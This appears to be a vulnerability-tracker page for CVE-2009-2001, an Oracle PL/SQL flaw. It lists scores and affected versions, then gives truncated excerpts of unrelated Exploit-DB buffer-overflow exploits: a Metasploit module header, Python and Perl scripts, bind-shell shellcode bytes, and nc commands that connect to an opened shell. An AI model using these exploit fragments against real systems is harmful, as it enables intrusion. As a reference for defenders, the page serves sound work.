CVE-2009-2001
published 2009-10-22CVE-2009-2001: Unspecified vulnerability in the PL/SQL component in Oracle Database 10.2.0.4 and 11.1.0.7 allows remote authenticated users to affect confidentiality…
PriorityP432medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EPSS
2.31%
81.6th percentile
Unspecified vulnerability in the PL/SQL component in Oracle Database 10.2.0.4 and 11.1.0.7 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | database_server | — | — |
| oracle | database_server | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MakeSFX.exe 1.44 - Local Stack Buffer Overflow
exploitdb·2015-09-30
MakeSFX.exe 1.44 - Local Stack Buffer Overflow
MakeSFX.exe 1.44 - Local Stack Buffer Overflow
---
'''
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt
Vendor:
freeextractor.sourceforge.net/FreeExtractor
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe
Vulnerable Product:
MakeSFX.exe v1.44
Mar 19 2001 & Dec 10 2009 versions
Vulnerability Type:
Stack Based Buffer Overflow
CVE Reference:
N/A
Vulnerability Details:
Converts a zip file into a 32-bit GUI Windows self-extractor.
Example usage:
makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
[/website="http://www.example.com"] [/intro="This is a test self extractor"]
[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerw
Exploit-DB
WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
exploitdb·2009-12-06
CVE-2001-0168 WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
WinVNC Web Server 3.3.3r7 - GET Overflow (Metasploit)
---
##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WinVNC Web Server %q{
This module exploits a buffer overflow in the AT&T WinVNC version
'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'BID', '2306' ],
[ 'OSVDB', '6280' ],
[ 'CVE', '2001-0168' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 979,
'BadChars' => "\x00\x09\x0a\x0
Exploit-DB
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder:
Exploit-DB
Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2009-09-09
CVE-2009-3221 Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
---
# Audio Lib Player m3u SEH overwrite
# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\blake\Desktop\ALP>
import sys
print "\n[*] Audio Lib Player m3u SEH Overwrite"
print "[*] Written by Blake"
print "[*] Tested on Windows XP SP3\n"
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\
Exploit-DB
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
exploitdb·2009-03-12
CVE-2009-1029 POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
---
#!/usr/bin/perl
# KL0309EXP-poppeeper_date-bof.pl
# 03.12.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (more love for no /SafeSEH). Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [[email protected]]
#
# rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl
# xx.xx.xx.xx
# rush@linux:~$ nc xx.xx.xx.xx 55555
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\POP Peeper>exit
# exit
# rush@linux:~$
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
# http://www
No writeups or analysis indexed.
http://secunia.com/advisories/37027http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.htmlhttp://www.securityfocus.com/bid/36743http://www.securitytracker.com/id?1023057http://www.us-cert.gov/cas/techalerts/TA09-294A.htmlhttp://secunia.com/advisories/37027http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.htmlhttp://www.securityfocus.com/bid/36743http://www.securitytracker.com/id?1023057http://www.us-cert.gov/cas/techalerts/TA09-294A.html
2009-10-22
Published